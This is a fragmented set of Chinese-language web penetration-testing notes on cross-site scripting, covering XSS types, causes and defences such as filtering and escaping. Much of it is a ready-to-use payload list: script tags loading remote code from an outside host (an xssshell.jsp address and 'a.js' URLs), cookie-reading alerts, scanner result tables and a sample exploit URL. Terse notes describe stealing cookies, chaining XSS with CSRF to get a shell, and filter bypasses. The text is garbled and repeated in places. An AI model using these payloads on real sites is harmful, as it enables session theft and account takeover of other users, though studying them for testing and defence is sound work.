Xss跨站腳本攻擊
- Xss通用明文 &&表單劫持
- 跨站腳本攻擊漏洞概念,
- 漏洞原理和危害,
- 掌握反射型、存儲型XSS漏洞利用方法
- web安全工程師-03-XSS漏洞原理與利用
- 第一章:XSS基礎
- 1.1 XSS介紹與原理~1
- 1.2 存儲型XSS實戰
- 1.3 反射型XSS實戰
- 1.4 DOM型XSS實戰
- 1.5 XSS輔助測試工具
- 第二章: XSS實戰與防御機制繞過
- 2.1 存儲型XSS多場景實戰及Bypass詳解
- 2.3 反射型XSS多場景實戰及Bypass詳解~1
- 2.4 DOM型XSS多場景實戰及Bypass詳解~1
- 第三章:XSS高級
淺談XSS漏洞挖掘 https
:有輸入的地方就試試,對可以觸發XSS的地方做總結輸入即輸出
對用戶的輸入在沒有進行任何過濾的情況下進行了輸出。
輸出報錯信息的時候直接把用戶輸入的內容直接進行了輸出。
猜想可能由于現在對信息安全的重視,涉及到業務方面的輸入數據的過濾編碼已經很成熟,
對一些錯誤信息的輸出可能重視還不夠大。該漏洞的觸發就是在返回錯誤信息的時候回返回方法名,這個方法名攻擊者可以自己定義,導致觸發了XSS漏洞
在返回錯誤信息的時候回返回參數FUZZ參數觸發XSS
XSS(跨站腳本)概述
Cross-Site Scripting 簡稱為“CSS”,
為避免與前端疊成樣式表的縮寫"CSS"沖突,故又稱XSS。
一般XSS可以分為如下幾種常見類型:1.反射性XSS;2.存儲型XSS;
3.DOM型XSS;XSS漏洞一直被評估為web漏洞中危害較大的漏洞,
在OWASP TOP10的排名中一直屬于前三的江湖地位。XSS是一種發生在前端瀏覽器端的漏洞,所以其危害的對象也是前端用戶。形成XSS漏洞的主要原因是程序對輸入和輸出沒有做合適的處理,
導致“精心構造”的字符輸出在前端時被瀏覽器當作有效代碼解析執行從而產生危害。因此在XSS漏洞的防范上,
一般會采用“對輸入進行過濾”和“輸出進行轉義”的方式進行處理: 輸入過濾:對輸入進行過濾,不允許可能導致XSS攻擊的字符輸入;
輸出轉義:根據輸出點的位置對輸出到前端的內容進行適當轉義;"'><textarea+autofocus+onfocus=alert(45)><iframe/src=JavaScriPt:alert(45)><script>alert(aming)</script><script src=”http://192.168.1.19/xssshell.jsp?v=336699″></script>
><script>alert(document.cookie)</script>
=’><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<script>alert(‘XSS’)</script>
<img src=”javascript:alert(‘XSS’)”>
<script>alert(‘Vulnerable’)</script>
<IFRAME SRC=javascript:alert(‘XSS’)></IFRAME>
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
<BODY ONLOAD=alert(‘XSS’)>
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
<SCRIPT a=”>” SRC=”http://xxxx/a.js”></SCRIPT>
<SCRIPT =”>” SRC=”http://xxxxx/a.js”></SCRIPT>
<SCRIPT a=”>” ” SRC=”http://xxxxx/a.js”></SCRIPT>
<SCRIPT “a=’>’” SRC=”http://xxxxx/a.js”></SCRIPT><img src=x onerror=alert(45)>
<svg/onload=alert(45)>
<script>alert(45)</script>
<img/src onerror=alert(45)>
"><iframe/src=JavaScriPt:alert(45)>
<video/poster/onerror=alert(45)>
<audio src onloadstart=alert(45)>
<meter onmouseover=alert(45)>0</meter>
<marquee onstart=alert(45)>
<select autofocus onfocus=alert(45)>
<input autofocus onfocus=alert(45)>
<keygen autofocus onfocus=alert(45)>
<textarea autofocus onfocus=alert(45)><original query>
onhwul=64
<svg/onload=alert(45)> | reflected XSS Code |
<script>alert(45)</script> | reflected XSS Code |
| 9 | HIGH | XSS | GET | type | <marquee onstart=alert(45)> | reflected HTML5 XSS Code |
| 10 | HIGH | XSS | GET | type | <meter onmouseover=alert(45)>0</meter> | reflected HTML5 XSS Code |
| 11 | HIGH | XSS | GET | type | <audio src onloadstart=alert(45)> | reflected HTML5 XSS Code |
| 12 | HIGH | XSS | GET | type | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code |
| 13 | HIGH | XSS | GET | type | <video/poster/onerror=alert(45)> | reflected HTML5 XSS Code |
| 14 | HIGH | XSS | GET | type | <img/src onerror=alert(45)> | reflected XSS Code |
| 15 | HIGH | XSS | GET | type | <input autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
| 16 | HIGH | XSS | GET | type | <keygen autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
| 17 | HIGH | XSS | GET | type | <select autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
<textarea autofocus onfocus=alert(45)> | reflected onfocus XSS Code |http://www.xxxx.com/tool/search.php?
title=88952634
&mod=main
&file=html
&action=index"'><textarea+autofocus+onfocus=alert(45)>
&dosubmit=1
Xss通用明文 &&表單劫持
-
跨站腳本攻擊漏洞概念,
-
漏洞原理和危害,
-
掌握反射型、存儲型XSS漏洞利用方法
web安全工程師-03-XSS漏洞原理與利用
第一章:XSS基礎
1.1 XSS介紹與原理~1
打cookie xss + csrf getshell
用來攻擊 使用瀏覽器 打開這個 頁面的 用戶 獲取cookie 正常用戶/管理員 權限
反射型 - 非存儲型 通常 xss 代碼 Payload (js) 通過 get 某個參數 傳入 后端
沒有經過 存儲 直接反射回 用戶頁面 (html)上
存儲型payload 存 在某一介質 (數據庫、緩存、文件)用戶 查看這個頁面時 展示 頁面 取出數據 時 執行
跟反射型類似但接受者 不再是 后端程序 而是 js 拿到參數 直接 在頁面 顯示
html 實體編碼 大多數 管用白名單 發表文章 富文本 過濾掉 js代碼 或者 涉及非法的屬性只div a p b 標簽 排除onError、onLoad 事件屬性 只 src 黑名單 可能會繞過xss 業務場景 對癥 反射 get 輸入 script代碼塊 輸出
xss 流程
payload 構造
驗證
修復
xss 高階 新用法
xss持久化
xss系列
1.2 存儲型XSS實戰
被實體轉義
我日我自己
用戶登錄 憑證
換個用戶登錄
盜取cookie
怎么修復
看 數據庫 中 可控字段
1.3 反射型XSS實戰
通過 url 參數 傳入 惡意代碼
value 閉合 掉
反射型 修復
orm 模型 查詢
剛才 訪問頁面 自動給 焦點 就會一直觸發
語法
閉合
或者 屬性 彈窗
html 實體轉義掉
1.4 DOM型XSS實戰
js 實現
dom型 不一定 是 url 傳過來的 參數
1.5 XSS輔助測試工具
繞過
第二章: XSS實戰與防御機制繞過
2.1 存儲型XSS多場景實戰及Bypass詳解
去掉空格 截斷函數
反斜杠 處理
處理 編碼問題
數據展示 的 類
實體轉義 標簽 防止 執行
輸入 沒做處理
輸出 做了處理 沒做完全
編寫 payload
長度限制 添加注釋
注釋 閉合 網頁標簽
dom節點
多段提交
注釋 執行
多點限制 加密 編碼
取值 得值 謹慎
2.3 反射型XSS多場景實戰及Bypass詳解~1
payload 多次 url 編碼
瀏覽器默認 解碼一次 url編碼
2.4 DOM型XSS多場景實戰及Bypass詳解~1
存儲 + DOM
漏洞 分析 + 挖掘
第三章:XSS高級
總結
以上是生活随笔為你收集整理的Web渗透测试-Xss跨站脚本攻击(Cross Site Scripting)的全部內容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。